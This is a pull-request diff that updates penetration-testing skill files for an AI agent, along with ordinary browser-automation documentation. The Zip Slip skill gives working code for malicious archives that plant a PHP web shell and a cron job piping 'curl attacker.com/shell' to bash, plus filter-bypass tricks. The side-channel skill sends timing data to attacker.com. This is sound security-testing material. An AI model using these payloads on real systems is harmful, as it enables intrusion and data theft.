### PR TITLE
feat: ads/cap 987 skill optimizer

### DIFF
--- a/capabilities/web-security/capability.yaml
+++ b/capabilities/web-security/capability.yaml
@@ -1,8 +1,8 @@
 schema: 1
 name: web-security
-version: "1.0.3"
+version: "1.1.0"
 description: >
-  Web application penetration testing with 30+ attack technique playbooks
+  Web application penetration testing with 60+ attack technique playbooks
   covering request smuggling, cache poisoning, SSRF, SSTI, DOM
   vulnerabilities, authentication bypasses, parser differentials,
   AEM/Sling exploitation, and client-side attacks. Includes HTTP client

--- a/capabilities/web-security/skills/agent-browser/SKILL.md
+++ b/capabilities/web-security/skills/agent-browser/SKILL.md
@@ -53,61 +53,21 @@ agent-browser open https://example.com && agent-browser wait --load networkidle 
 
 ## Handling Authentication
 
-When automating a site that requires login, choose the approach that fits:
+Choose the approach that fits. See [references/authentication.md](references/authentication.md) for full details including OAuth, 2FA, and token refresh.
 
-**Option 1: Import auth from the user's browser (fastest for one-off tasks)**
+| Approach | When | Command |
+|---|---|---|
+| Auth vault | Recurring tasks, password never exposed to LLM | `echo "$PW" \| agent-browser auth save myapp --url <url> --username user --password-stdin` then `agent-browser auth login myapp` |
+| Session name | Auto-save/restore cookies across restarts | `agent-browser --session-name myapp open <url>` |
+| Persistent profile | Full browser profile reuse | `agent-browser --profile ~/.myapp open <url>` |
+| Import from user browser | One-off tasks, user already logged in | `agent-browser --auto-connect state save ./auth.json` then `agent-browser --state ./auth.json open <url>` |
+| State file | Manual save/load | `agent-browser state save auth.json` / `agent-browser state load auth.json` |
 
-```bash
-# Connect to the user's running Chrome (they're already logged in)
-agent-browser --auto-connect state save ./auth.json
-# Use that auth state
-agent-browser --state ./auth.json open https://app.example.com/dashboard
-```
-
-State files contain session tokens in plaintext -- add to `.gitignore` and delete when no longer needed. Set `AGENT_BROWSER_ENCRYPTION_KEY` for encryption at rest.
-
-**Option 2: Persistent profile (simplest for recurring tasks)**
-
-```bash
-# First run: login manually or via automation
-agent-browser --profile ~/.myapp open https://app.example.com/login
-# ... fill credentials, submit ...
-
-# All future runs: already authenticated
-agent-browser --profile ~/.myapp open https://app.example.com/dashboard
-```
-
-**Option 3: Session name (auto-save/restore cookies + localStorage)**
-
-```bash
-agent-browser --session-name myapp open https://app.example.com/login
-# ... login flow ...
-agent-browser close  # State auto-saved
-
-# Next time: state auto-restored
-agent-browser --session-name myapp open https://app.example.com/dashboard
-```
-
-**Option 4: Auth vault (credentials stored encrypted, login by name)**
-
-```bash
-echo "$PASSWORD" | agent-browser auth save myapp --url https://app.example.com/login --username user --password-stdin
-agent-browser auth login myapp
-```
-
-**Option 5: State file (manual save/load)**
-
-```bash
-# After logging in:
-agent-browser state save ./auth.json
-# In a future session:
-agent-browser state load ./auth.json
-agent-browser open https://app.example.com/dashboard
-```
-
-See [references/authentication.md](references/authentication.md) for OAuth, 2FA, cookie-based auth, and token refresh patterns.
+State files contain session tokens in plaintext -- add to `.gitignore` and set `AGENT_BROWSER_ENCRYPTION_KEY` for encryption at rest.
 
 ## Essential Commands
+
+For the full command reference with all options, see [references/commands.md](references/commands.md).
 
 ```bash
 # Navigation
@@ -116,101 +76,41 @@ agent-browser close                   # Close browser
 
 # Snapshot
 agent-browser snapshot -i             # Interactive elements with refs (recommended)
-agent-browser snapshot -i -C          # Include cursor-interactive elements (divs with onclick, cursor:pointer)
+agent-browser snapshot -i -C          # Include cursor-interactive elements
 agent-browser snapshot -s "#selector" # Scope to CSS selector
 
 # Interaction (use @refs from snapshot)
 agent-browser click @e1               # Click element
-agent-browser click @e1 --new-tab     # Click and open in new tab
 agent-browser fill @e2 "text"         # Clear and type text
 agent-browser type @e2 "text"         # Type without clearing
 agent-browser select @e1 "option"     # Select dropdown option
 agent-browser check @e1               # Check checkbox
 agent-browser press Enter             # Press key
-agent-browser keyboard type "text"    # Type at current focus (no selector)
-agent-browser keyboard inserttext "text"  # Insert without key events
 agent-browser scroll down 500         # Scroll page
-agent-browser scroll down 500 --selector "div.content"  # Scroll within a specific container
 
 # Get information
 agent-browser get text @e1            # Get element text
 agent-browser get url                 # Get current URL
-agent-browser get title               # Get page title
-agent-browser get cdp-url             # Get CDP WebSocket URL
 
 # Wait
 agent-browser wait @e1                # Wait for element
 agent-browser wait --load networkidle # Wait for network idle
 agent-browser wait --url "**/page"    # Wait for URL pattern
-agent-browser wait 2000               # Wait milliseconds
-agent-browser wait --text "Welcome"    # Wait for text to appear (substring match)
-agent-browser wait --fn "!document.body.innerText.includes('Loading...')"  # Wait for text to disappear
+agent-browser wait --text "Welcome"   # Wait for text to appear
 agent-browser wait "#spinner" --state hidden  # Wait for element to disappear
-
-# Downloads
-agent-browser download @e1 ./file.pdf          # Click element to trigger download
-agent-browser wait --download ./output.zip     # Wait for any download to complete
-agent-browser --download-path ./downloads open <url>  # Set default download directory
-
-# Viewport & Device Emulation
-agent-browser set viewport 1920 1080          # Set viewport size (default: 1280x720)
-agent-browser set viewport 1920 1080 2        # 2x retina (same CSS size, higher res screenshots)
-agent-browser set device "iPhone 14"          # Emulate device (viewport + user agent)
 
 # Capture
 agent-browser screenshot              # Screenshot to temp dir
 agent-browser screenshot --full       # Full page screenshot
-agent-browser screenshot --annotate   # Annotated screenshot with numbered element labels
-agent-browser screenshot --screenshot-dir ./shots  # Save to custom directory
-agent-browser screenshot --screenshot-format jpeg --screenshot-quality 80
+agent-browser screenshot --annotate   # Annotated with numbered element labels
 agent-browser pdf output.pdf          # Save as PDF
 
-# Clipboard
-agent-browser clipboard read                      # Read text from clipboard
-agent-browser clipboard write "Hello, World!"     # Write text to clipboard
-agent-browser clipboard copy                      # Copy current selection
-agent-browser clipboard paste                     # Paste from clipboard
-
 # Diff (compare page states)
-agent-browser diff snapshot                          # Compare current vs last snapshot
-agent-browser diff snapshot --baseline before.txt    # Compare current vs saved file
+agent-browser diff snapshot           # Compare current vs last snapshot
 agent-browser diff screenshot --baseline before.png  # Visual pixel diff
-agent-browser diff url <url1> <url2>                 # Compare two pages
-agent-browser diff url <url1> <url2> --wait-until networkidle  # Custom wait strategy
-agent-browser diff url <url1> <url2> --selector "#main"  # Scope to element
 ```
 
 ## Common Patterns
-
-### Form Submission
-
-```bash
-agent-browser open https://example.com/signup
-agent-browser snapshot -i
-agent-browser fill @e1 "Jane Doe"
-agent-browser fill @e2 "jane@example.com"
-agent-browser select @e3 "California"
-agent-browser check @e4
-agent-browser click @e5
-agent-browser wait --load networkidle
-```
-
-### Authentication (see [references/authentication.md](references/authentication.md) for full details)
-
-```bash
-# Auth vault (recommended): credentials stored encrypted, LLM never sees password
-echo "pass" | agent-browser auth save github --url https://github.com/login --username user --password-stdin
-agent-browser auth login github
-
-# Session persistence: auto-save/restore across restarts
-agent-browser --session-name myapp open https://app.example.com/login
-# ... login flow ...
-agent-browser close  # State auto-saved
-
-# State files: manual save/load
-agent-browser state save auth.json
-agent-browser state load auth.json
-```
 
 ### Data Extraction
 
@@ -251,38 +151,19 @@ agent-browser --cdp 9222 snapshot
 ### Color Scheme (Dark Mode)
 
 ```bash
-# Persistent dark mode via flag (applies to all pages and new tabs)
-agent-browser --color-scheme dark open https://example.com
-
-# Or via environment variable
-AGENT_BROWSER_COLOR_SCHEME=dark agent-browser open https://example.com
-
-# Or set during session (persists for subsequent commands)
-agent-browser set media dark
+agent-browser --color-scheme dark open https://example.com    # Flag
+AGENT_BROWSER_COLOR_SCHEME=dark agent-browser open https://example.com  # Env var
+agent-browser set media dark                                  # During session
 ```
 
 ### Viewport & Responsive Testing
 
 ```bash
-# Set a custom viewport size (default is 1280x720)
-agent-browser set viewport 1920 1080
-agent-browser screenshot desktop.png
-
-# Test mobile-width layout
-agent-browser set viewport 375 812
-agent-browser screenshot mobile.png
-
-# Retina/HiDPI: same CSS layout at 2x pixel density
-# Screenshots stay at logical viewport size, but content renders at higher DPI
-agent-browser set viewport 1920 1080 2
-agent-browser screenshot retina.png
-
-# Device emulation (sets viewport + user agent in one step)
-agent-browser set device "iPhone 14"
-agent-browser screenshot device.png
+agent-browser set viewport 1920 1080          # Desktop
+agent-browser set viewport 375 812            # Mobile
+agent-browser set viewport 1920 1080 2        # Retina (3rd arg = devicePixelRatio)
+agent-browser set device "iPhone 14"          # Device emulation (viewport + UA)
 ```
-
-The `scale` parameter (3rd argument) sets `window.devicePixelRatio` without changing CSS layout. Use it when testing retina rendering or capturing higher-resolution screenshots.
 
 ### Visual Browser (Debugging)
 
@@ -309,28 +190,12 @@ agent-browser screenshot output.png
 ### iOS Simulator (Mobile Safari)
 
 ```bash
-# List available iOS simulators
-agent-browser device list
-
-# Launch Safari on a specific device
 agent-browser -p ios --device "iPhone 16 Pro" open https://example.com
-
-# Same workflow as desktop - snapshot, interact, re-snapshot
-agent-browser -p ios snapshot -i
-agent-browser -p ios tap @e1          # Tap (alias for click)
-agent-browser -p ios fill @e2 "text"
-agent-browser -p ios swipe up         # Mobile-specific gesture
-
-# Take screenshot
-agent-browser -p ios screenshot mobile.png
-
-# Close session (shuts down simulator)
+agent-browser -p ios snapshot -i && agent-browser -p ios tap @e1
 agent-browser -p ios close
 ```
 
-**Requirements:** macOS with Xcode, Appium (`npm install -g appium && appium driver install xcuitest`)
-
-**Real devices:** Works with physical iOS devices if pre-configured. Use `--device "<UDID>"` where UDID is from `xcrun xctrace list devices`.
+Requires macOS with Xcode and Appium (`npm install -g appium && appium driver install xcuitest`). Same workflow as desktop (snapshot, interact, re-snapshot). Use `--device "<UDID>"` for physical devices.
 
 ## Security
 
@@ -410,55 +275,30 @@ agent-browser diff url https://staging.example.com https://prod.example.com --sc
 
 ## Timeouts and Slow Pages
 
-The default timeout is 25 seconds. This can be overridden with the `AGENT_BROWSER_DEFAULT_TIMEOUT` environment variable (value in milliseconds). For slow websites or large pages, use explicit waits instead of relying on the default timeout:
+Default timeout is 25s (override with `AGENT_BROWSER_DEFAULT_TIMEOUT` in ms). For slow pages, use explicit waits after `open`:
 
 ```bash
-# Wait for network activity to settle (best for slow pages)
-agent-browser wait --load networkidle
-
-# Wait for a specific element to appear
-agent-browser wait "#content"
-agent-browser wait @e1
-
-# Wait for a specific URL pattern (useful after redirects)
-agent-browser wait --url "**/dashboard"
-
-# Wait for a JavaScript condition
-agent-browser wait --fn "document.readyState === 'complete'"
-
-# Wait a fixed duration (milliseconds) as a last resort
-agent-browser wait 5000
+agent-browser wait --load networkidle          # Best for slow pages
+agent-browser wait "#content"                  # Wait for specific element
+agent-browser wait --url "**/dashboard"        # Wait for URL pattern (after redirects)
+agent-browser wait --fn "document.readyState === 'complete'"  # JS condition
+agent-browser wait 5000                        # Fixed delay (last resort)
 ```
-
-When dealing with consistently slow websites, use `wait --load networkidle` after `open` to ensure the page is fully loaded before taking a snapshot. If a specific element is slow to render, wait for it directly with `wait <selector>` or `wait @ref`.
 
 ## Session Management and Cleanup
 
-When running multiple agents or automations concurrently, always use named sessions to avoid conflicts:
+Use named sessions for concurrent automations. Always close sessions when done to avoid leaked processes:
 
 ```bash
-# Each agent gets its own isolated session
 agent-browser --session agent1 open site-a.com
 agent-browser --session agent2 open site-b.com
-
-# Check active sessions
-agent-browser session list
+agent-browser session list                         # Check active sessions
+agent-browser --session agent1 close               # Close specific session
+agent-browser close                                # Close default session
+AGENT_BROWSER_IDLE_TIMEOUT_MS=60000 agent-browser open example.com  # Auto-shutdown after inactivity
 ```
 
-Always close your browser session when done to avoid leaked processes:
-
-```bash
-agent-browser close                    # Close default session
-agent-browser --session agent1 close   # Close specific session
-```
-
-If a previous session was not closed properly, the daemon may still be running. Use `agent-browser close` to clean it up before starting new work.
-
-To auto-shutdown the daemon after a period of inactivity (useful for ephemeral/CI environments):
-
-```bash
-AGENT_BROWSER_IDLE_TIMEOUT_MS=60000 agent-browser open example.com
-```
+If a previous session was not closed properly, run `agent-browser close` to clean up the daemon.
 
 ## Ref Lifecycle (Important)
 
@@ -508,14 +348,13 @@ agent-browser find testid "submit-btn" click
 
 ## JavaScript Evaluation (eval)
 
-Use `eval` to run JavaScript in the browser context. **Shell quoting can corrupt complex expressions** -- use `--stdin` or `-b` to avoid issues.
+Use `--stdin` with heredoc for anything beyond simple expressions (avoids shell quoting issues):
 
 ```bash
-# Simple expressions work with regular quoting
+# Simple expressions
 agent-browser eval 'document.title'
-agent-browser eval 'document.querySelectorAll("img").length'
 
-# Complex JS: use --stdin with heredoc (RECOMMENDED)
+# Complex JS (recommended approach for nested quotes, arrow functions, multiline)
 agent-browser eval --stdin <<'EVALEOF'
 JSON.stringify(
   Array.from(document.querySelectorAll("img"))
@@ -524,31 +363,13 @@ JSON.stringify(
 )
 EVALEOF
 
-# Alternative: base64 encoding (avoids all shell escaping issues)
+# Programmatic/generated scripts: base64 encoding
 agent-browser eval -b "$(echo -n 'Array.from(document.querySelectorAll("a")).map(a => a.href)' | base64)"
 ```
 
-**Why this matters:** When the shell processes your command, inner double quotes, `!` characters (history expansion), backticks, and `$()` can all corrupt the JavaScript before it reaches agent-browser. The `--stdin` and `-b` flags bypass shell interpretation entirely.
-
-**Rules of thumb:**
-
-- Single-line, no nested quotes -> regular `eval 'expression'` with single quotes is fine
-- Nested quotes, arrow functions, template literals, or multiline -> use `eval --stdin <<'EVALEOF'`
-- Programmatic/generated scripts -> use `eval -b` with base64
-
 ## Configuration File
 
-Create `agent-browser.json` in the project root for persistent settings:
-
-```json
-{
-  "headed": true,
-  "proxy": "http://localhost:8080",
-  "profile": "./browser-data"
-}
-```
-
-Priority (lowest to highest): `~/.agent-browser/config.json` < `./agent-browser.json` < env vars < CLI flags. Use `--config <path>` or `AGENT_BROWSER_CONFIG` env var for a custom config file (exits with error if missing/invalid). All CLI options map to camelCase keys (e.g., `--executable-path` -> `"executablePath"`). Boolean flags accept `true`/`false` values (e.g., `--headed false` overrides config). Extensions from user and project configs are merged, not replaced.
+Create `agent-browser.json` in the project root for persistent settings. All CLI options map to camelCase keys (e.g., `--executable-path` -> `"executablePath"`). Priority: `~/.agent-browser/config.json` < `./agent-browser.json` < env vars < CLI flags.
 
 ## Deep-Dive Documentation
 
@@ -564,22 +385,8 @@ Priority (lowest to highest): `~/.agent-browser/config.json` < `./agent-browser.
 
 ## Browser Engine Selection
 
-Use `--engine` to choose a local browser engine. The default is `chrome`.
+Default engine is `chrome`. Use `--engine lightpanda` for 10x faster headless browsing (does not support `--extension`, `--profile`, `--state`, or `--allow-file-access`):
 
 ```bash
-# Use Lightpanda (fast headless browser, requires separate install)
 agent-browser --engine lightpanda open example.com
-
-# Via environment variable
-export AGENT_BROWSER_ENGINE=lightpanda
-agent-browser open example.com
-
-# With custom binary path
-agent-browser --engine lightpanda --executable-path /path/to/lightpanda open example.com
 ```
-
-Supported engines:
-- `chrome` (default) -- Chrome/Chromium via CDP
-- `lightpanda` -- Lightpanda headless browser via CDP (10x faster, 10x less memory than Chrome)
-
-Lightpanda does not support `--extension`, `--profile`, `--state`, or `--allow-file-access`. Install Lightpanda from https://lightpanda.io/docs/open-source/installation.

--- a/capabilities/web-security/skills/agent-browser/SKILL.md
+++ b/capabilities/web-security/skills/agent-browser/SKILL.md
@@ -195,59 +195,21 @@ agent-browser click @e5
 agent-browser wait --load networkidle
 ```
 
-### Authentication with Auth Vault (Recommended)
+### Authentication (see [references/authentication.md](references/authentication.md) for full details)
 
 ```bash
-# Save credentials once (encrypted with AGENT_BROWSER_ENCRYPTION_KEY)
-# Recommended: pipe password via stdin to avoid shell history exposure
+# Auth vault (recommended): credentials stored encrypted, LLM never sees password
 echo "pass" | agent-browser auth save github --url https://github.com/login --username user --password-stdin
-
-# Login using saved profile (LLM never sees password)
 agent-browser auth login github
 
-# List/show/delete profiles
-agent-browser auth list
-agent-browser auth show github
-agent-browser auth delete github
-```
-
-### Authentication with State Persistence
-
-```bash
-# Login once and save state
-agent-browser open https://app.example.com/login
-agent-browser snapshot -i
-agent-browser fill @e1 "$USERNAME"
-agent-browser fill @e2 "$PASSWORD"
-agent-browser click @e3
-agent-browser wait --url "**/dashboard"
-agent-browser state save auth.json
-
-# Reuse in future sessions
-agent-browser state load auth.json
-agent-browser open https://app.example.com/dashboard
-```
-
-### Session Persistence
-
-```bash
-# Auto-save/restore cookies and localStorage across browser restarts
+# Session persistence: auto-save/restore across restarts
 agent-browser --session-name myapp open https://app.example.com/login
 # ... login flow ...
-agent-browser close  # State auto-saved to ~/.agent-browser/sessions/
+agent-browser close  # State auto-saved
 
-# Next time, state is auto-loaded
-agent-browser --session-name myapp open https://app.example.com/dashboard
-
-# Encrypt state at rest
-export AGENT_BROWSER_ENCRYPTION_KEY=$(openssl rand -hex 32)
-agent-browser --session-name secure open https://app.example.com
-
-# Manage saved states
-agent-browser state list
-agent-browser state show myapp-default.json
-agent-browser state clear myapp
-agent-browser state clean --older-than 7
+# State files: manual save/load
+agent-browser state save auth.json
+agent-browser state load auth.json
 ```
 
 ### Data Extraction
@@ -621,4 +583,3 @@ Supported engines:
 - `lightpanda` -- Lightpanda headless browser via CDP (10x faster, 10x less memory than Chrome)
 
 Lightpanda does not support `--extension`, `--profile`, `--state`, or `--allow-file-access`. Install Lightpanda from https://lightpanda.io/docs/open-source/installation.
-

--- a/capabilities/web-security/skills/archive-path-traversal/SKILL.md
+++ b/capabilities/web-security/skills/archive-path-traversal/SKILL.md
@@ -1,0 +1,113 @@
+---
+name: archive-path-traversal
+description: "Zip Slip and archive extraction path traversal vulnerabilities. Use when target has file upload with archive extraction, plugin installers, backup restoration, or any feature that unpacks ZIP/TAR/JAR/WAR/APK archives."
+---
+
+# Archive Path Traversal (Zip Slip)
+
+When an application extracts archive entries using the entry name directly as the output path without canonicalization, an attacker-controlled entry name like `../../../etc/cron.d/pwn` writes outside the intended directory.
+
+## Vulnerable Code Patterns
+
+See [references/vulnerable-code.md](references/vulnerable-code.md) for patterns in Java, Python, Node.js, Go, Ruby, and .NET.
+
+The bug is always the same: `entry.getName()` flows into a file path constructor without validation that the resolved path stays inside the target directory.
+
+## Crafting Malicious Archives
+
+```python
+import zipfile
+
+with zipfile.ZipFile('evil.zip', 'w') as z:
+    z.writestr('../../var/www/html/shell.php', '<?php system($_GET["c"]); ?>')
+    z.writestr('../../etc/cron.d/pwn', '* * * * * root curl attacker.com/shell | bash\n')
+    z.writestr('readme.txt', 'Totally normal archive')
+```
+
+```bash
+# Using evilarc
+python evilarc.py shell.php -p "var/www/html" -d 3 -o unix
+
+# TAR archives
+tar cf evil.tar --transform='s,^,../../etc/cron.d/,' pwn
+```
+
+## Exploitation Targets
+
+| Target File | Impact | OS |
+|-------------|--------|-----|
+| `../../var/www/html/shell.php` | Web shell (RCE) | Linux |
+| `../../etc/cron.d/pwn` | Cron job (RCE) | Linux |
+| `../../root/.ssh/authorized_keys` | SSH access | Linux |
+| `../../WEB-INF/classes/Evil.class` | Java class injection | Java |
+| `../../inetpub/wwwroot/cmd.aspx` | Web shell (IIS) | Windows |
+| `.env` or `../../.env` | Environment variable override | Any |
+
+Chain with **write-path-to-rce** for framework view/template resolution that turns file write into RCE.
+
+## Bypassing Path Traversal Filters
+
+| Technique | Entry Name | Bypasses |
+|-----------|-----------|----------|
+| Backslash (Windows) | `..\..\wwwroot\shell.aspx` | Unix-only `../` check |
+| Encoded slash | `..%2f..%2fetc/passwd` | String-based filter on raw name |
+| Double-encoded | `..%252f..%252f` | Single decode + filter + second decode |
+| Absolute path | `/etc/cron.d/pwn` | Relative path check only |
+| Mixed separators | `..\/..\/etc/passwd` | Strict `../` match |
+
+**Test order:** basic `../` first, then backslash, then encoded variants, then absolute paths.
+
+## Symlink Attacks
+
+Even if `../` in filenames is filtered, symlinks bypass path validation because the entry name itself is clean.
+
+### Two-Step Symlink Write
+
+```python
+import tarfile, io
+
+with tarfile.open('evil.tar', 'w') as t:
+    # Step 1: symlink "uploads" -> /var/www/html (clean name)
+    sym = tarfile.TarInfo(name='uploads')
+    sym.type = tarfile.SYMTYPE
+    sym.linkname = '/var/www/html'
+    t.addfile(sym)
+
+    # Step 2: write through symlink (still no ../ in name)
+    shell = tarfile.TarInfo(name='uploads/shell.php')
+    shell.size = len(payload)
+    t.addfile(shell, io.BytesIO(payload.encode()))
+```
+
+Extraction order matters: symlink created first, then file write follows the symlink. Path validation sees `uploads/shell.php` as inside dest_dir.
+
+## Detection in Source Code
+
+```bash
+# Java
+grep -rn "ZipEntry\|ZipInputStream\|JarEntry" --include="*.java"
+# Python
+grep -rn "zipfile\|tarfile\|extractall" --include="*.py"
+# Node.js
+grep -rn "adm-zip\|yauzl\|unzipper\|decompress" --include="*.js" --include="*.ts"
+# Go
+grep -rn "archive/zip\|archive/tar" --include="*.go"
+# .NET
+grep -rn "ZipArchive\|ZipFile" --include="*.cs"
+# Then verify: is there path validation after entry name extraction?
+```
+
+## Testing Checklist
+
+1. Identify all archive upload/extraction features
+2. Determine archive format accepted (ZIP, TAR, JAR, etc.)
+3. Craft malicious archive with `../` entry names
+4. Upload and check: does extraction create files outside dest dir?
+5. If blocked: try alternate traversal (backslash, encoded, symlink)
+6. If file write confirmed: identify highest-impact target file
+7. Chain with **write-path-to-rce** for code execution
+
+## Related Skills
+
+- **write-path-to-rce** -- Escalate file write to RCE via framework resolution
+- **custom-sanitizer-audit** -- If path sanitization exists but is bypassable

--- a/capabilities/web-security/skills/archive-path-traversal/references/vulnerable-code.md
+++ b/capabilities/web-security/skills/archive-path-traversal/references/vulnerable-code.md
@@ -1,0 +1,115 @@
+# Vulnerable Code Patterns by Language
+
+## Java (Most Common)
+
+```java
+// VULNERABLE
+ZipInputStream zis = new ZipInputStream(uploadedFile);
+ZipEntry entry;
+while ((entry = zis.getNextEntry()) != null) {
+    File outputFile = new File(destDir, entry.getName());
+    outputFile.getParentFile().mkdirs();
+    Files.copy(zis, outputFile.toPath());
+    // entry.getName() = "../../etc/cron.d/pwn" -> writes to /etc/cron.d/pwn
+}
+
+// SECURE
+File outputFile = new File(destDir, entry.getName()).getCanonicalFile();
+if (!outputFile.toPath().startsWith(destDir.getCanonicalFile().toPath())) {
+    throw new SecurityException("Zip Slip: " + entry.getName());
+}
+```
+
+## Python
+
+```python
+# VULNERABLE manual extraction (any Python version)
+with zipfile.ZipFile(uploaded, 'r') as z:
+    for info in z.infolist():
+        path = os.path.join(dest_dir, info.filename)
+        os.makedirs(os.path.dirname(path), exist_ok=True)
+        with open(path, 'wb') as f:
+            f.write(z.read(info.filename))
+
+# NOTE: extractall() is SAFE since Python 3.12+ (CVE-2007-4559 fix)
+
+# SECURE
+resolved = os.path.realpath(os.path.join(dest_dir, info.filename))
+if not resolved.startswith(os.path.realpath(dest_dir) + os.sep):
+    raise Exception("Zip Slip detected")
+```
+
+## Node.js
+
+```javascript
+// VULNERABLE (using adm-zip, yauzl, unzipper, etc.)
+const entries = zip.getEntries();
+entries.forEach(entry => {
+    const filePath = path.join(destDir, entry.entryName);
+    fs.writeFileSync(filePath, entry.getData());
+});
+
+// SECURE
+const resolved = path.resolve(path.join(destDir, entry.entryName));
+if (!resolved.startsWith(path.resolve(destDir) + path.sep)) {
+    throw new Error("Zip Slip: " + entry.entryName);
+}
+```
+
+## Go
+
+```go
+// VULNERABLE
+for _, f := range r.File {
+    fpath := filepath.Join(destDir, f.Name)
+    os.MkdirAll(filepath.Dir(fpath), os.ModePerm)
+    outFile, _ := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE, f.Mode())
+    rc, _ := f.Open()
+    io.Copy(outFile, rc)
+}
+
+// SECURE
+fpath := filepath.Join(destDir, f.Name)
+if !strings.HasPrefix(filepath.Clean(fpath), filepath.Clean(destDir)+string(os.PathSeparator)) {
+    return fmt.Errorf("zip slip: %s", f.Name)
+}
+```
+
+## Ruby
+
+```ruby
+# VULNERABLE (using rubyzip)
+Zip::File.open(uploaded) do |zip|
+  zip.each do |entry|
+    path = File.join(dest_dir, entry.name)
+    FileUtils.mkdir_p(File.dirname(path))
+    entry.extract(path)
+  end
+end
+
+# SECURE (rubyzip >= 1.3.0 has built-in protection)
+# Verify: Zip.validate_entry_sizes = true (default since 1.3.0)
+```
+
+## .NET/C#
+
+```csharp
+// VULNERABLE
+using (ZipArchive archive = ZipFile.OpenRead(uploaded))
+{
+    foreach (ZipArchiveEntry entry in archive.Entries)
+    {
+        string path = Path.Combine(destDir, entry.FullName);
+        entry.ExtractToFile(path, true);
+    }
+}
+
+// SECURE
+string destPath = Path.GetFullPath(Path.Combine(destDir, entry.FullName));
+if (!destPath.StartsWith(Path.GetFullPath(destDir) + Path.DirectorySeparatorChar))
+{
+    throw new IOException("Zip Slip: " + entry.FullName);
+}
+
+// NOTE: ZipFile.ExtractToDirectory() is SAFE (built-in check since .NET Core)
+```

--- a/capabilities/web-security/skills/blind-ssrf-chains/SKILL.md
+++ b/capabilities/web-security/skills/blind-ssrf-chains/SKILL.md
@@ -28,7 +28,9 @@ Don't try to read responses from the SSRF — find internal services that make *
 
 **OOB callback setup**: Use the `CallbackClient` tool to register a callback URL before testing. Request HTTPS protocol — many internal services only make HTTPS outbound requests. After triggering the SSRF chain, check for received callbacks to confirm the internal service made an outbound request.
 
-Canary-capable services: Confluence, Jira, Jenkins, Solr, Weblogic, Hystrix Dashboard. These all have endpoints that fetch attacker-controlled URLs as part of normal functionality.
+**Checkpoint:** Before attempting payloads, confirm blind SSRF with a canary: `?url=http://YOUR-OOB-SERVER/ssrf-test`. If no callback received, the SSRF may not be server-side.
+
+## Fingerprinting (Blind)
 
 ## Fingerprinting Without Response Bodies
 

--- a/capabilities/web-security/skills/browser-side-channel/SKILL.md
+++ b/capabilities/web-security/skills/browser-side-channel/SKILL.md
@@ -13,69 +13,88 @@ description: Browser-based side channel attacks for cross-origin data leaks via 
 ## Techniques
 
 ### XSS-Leak via Connection Pool Exhaustion (Chrome)
-Exploit Chrome's per-process socket pool limit to leak cross-origin redirects:
 
 1. **Saturate** Chrome's 256-connection pool (open 255 persistent connections)
 2. **Trigger** a cross-origin navigation that may redirect based on state
-3. **Measure** which host resolves next — Chrome resolves DNS in lexicographic order when pool is full
+3. **Measure** which host resolves next -- DNS timing differs under pool exhaustion
 4. **Binary search** the leaked hostname character by character
 
-Prerequisites: Victim visits attacker page, target redirects to different hosts based on auth state.
-
-Test setup:
 ```javascript
 // Saturate pool with 255 WebSocket connections to different hosts
 for (let i = 0; i < 255; i++) {
   new WebSocket(`wss://pad-${i}.attacker.com/hold`);
 }
-// Trigger cross-origin fetch — redirect destination leaks via timing
-fetch('https://target.com/auth-redirect', {mode: 'no-cors'});
-// Measure: if redirect went to admin.target.com vs login.target.com
-// the DNS resolution timing differs due to pool exhaustion ordering
+// Trigger cross-origin fetch -- redirect destination leaks via timing
+const start = performance.now();
+fetch('https://target.com/auth-redirect', {mode: 'no-cors'}).then(() => {
+  const elapsed = performance.now() - start;
+  // admin.target.com vs login.target.com have different DNS timing under pool exhaustion
+  navigator.sendBeacon('https://attacker.com/log', `elapsed=${elapsed}`);
+});
 ```
 
+**Checkpoint:** If timing variance between states is <5ms, increase sample count to 50+ and average. If WebSocket connections drop, server may be closing idle sockets -- send keepalive pings via `setInterval`.
+
 ### Cross-Site ETag Length Oracle (Express.js)
-Exploit Express's default 16KB header limit to create a boolean oracle:
 
 1. **Observe**: Express auto-generates ETag headers for responses
 2. **Trigger**: Browser caches ETag, sends it back as `If-None-Match`
 3. **Overflow**: Pad the request to approach 16KB header limit
-4. **Differentiate**: If ETag is long (large response) → 431 error. If short → 304 Not Modified.
-5. **Leak**: Response size reveals content (e.g., admin panel vs 403)
+4. **Differentiate**: Long ETag (large response) -> 431 error. Short -> 304 Not Modified.
 
 ```http
 GET /api/user/profile HTTP/1.1
 If-None-Match: "cached-etag-value"
 X-Pad: AAAA...AAAA  (pad to ~16KB minus ETag length threshold)
 ```
-- 431 = ETag + padding exceeded 16KB → response was large (user exists, has data)
-- 304 = ETag matched, response was small → different state
+- 431 = ETag + padding exceeded 16KB -> response was large (user exists, has data)
+- 304 = ETag matched, response was small -> different state
+
+**Checkpoint:** Send without padding first to confirm normal 200/304 behavior. Then binary search padding length: if 431 at N bytes but not N-100, ETag is between (16384-N) and (16384-N+100) bytes.
 
 ### Timing-Based State Detection
-Measure response time differences for cross-origin requests:
-```javascript
-const start = performance.now();
-const img = new Image();
-img.onload = img.onerror = () => {
-  const elapsed = performance.now() - start;
-  // Authenticated responses often larger/slower than 302 redirects
-  if (elapsed > THRESHOLD) { /* user is logged in */ }
-};
-img.src = 'https://target.com/dashboard-asset';
+
+```html
+<script>
+async function detectLoginState(targetUrl, samples = 30) {
+  const times = [];
+  for (let i = 0; i < samples; i++) {
+    const start = performance.now();
+    await new Promise(resolve => {
+      const img = new Image();
+      img.onload = img.onerror = resolve;
+      img.src = targetUrl + '?cachebust=' + Math.random();
+    });
+    times.push(performance.now() - start);
+  }
+  const mean = times.reduce((a, b) => a + b) / times.length;
+  const stddev = Math.sqrt(times.reduce((s, t) => s + (t - mean) ** 2, 0) / times.length);
+  return { mean: mean.toFixed(1), stddev: stddev.toFixed(1), samples: times.length };
+}
+
+// Logged-in: ~200ms+ (full page). Logged-out: ~50ms (302 redirect).
+detectLoginState('https://target.com/dashboard-asset').then(r =>
+  console.log(`Mean: ${r.mean}ms, StdDev: ${r.stddev}ms`)
+);
+</script>
 ```
 
-### Cache Probing
-Detect if a user has visited a URL by measuring cache hit vs miss timing:
-- Cached resource loads in ~1-2ms
-- Network fetch takes 50ms+
-- Reveals browsing history for same-origin resources
+**Checkpoint:** Run against a known-state endpoint first to establish baseline. If stddev >30% of mean, network jitter is too high -- increase sample count or use HTTP/2 multiplexing.
 
-## Detection Checklist
+### Cache Probing
+Cached resource loads in ~1-2ms vs network fetch at 50ms+. Reveals browsing history for same-site resources.
+
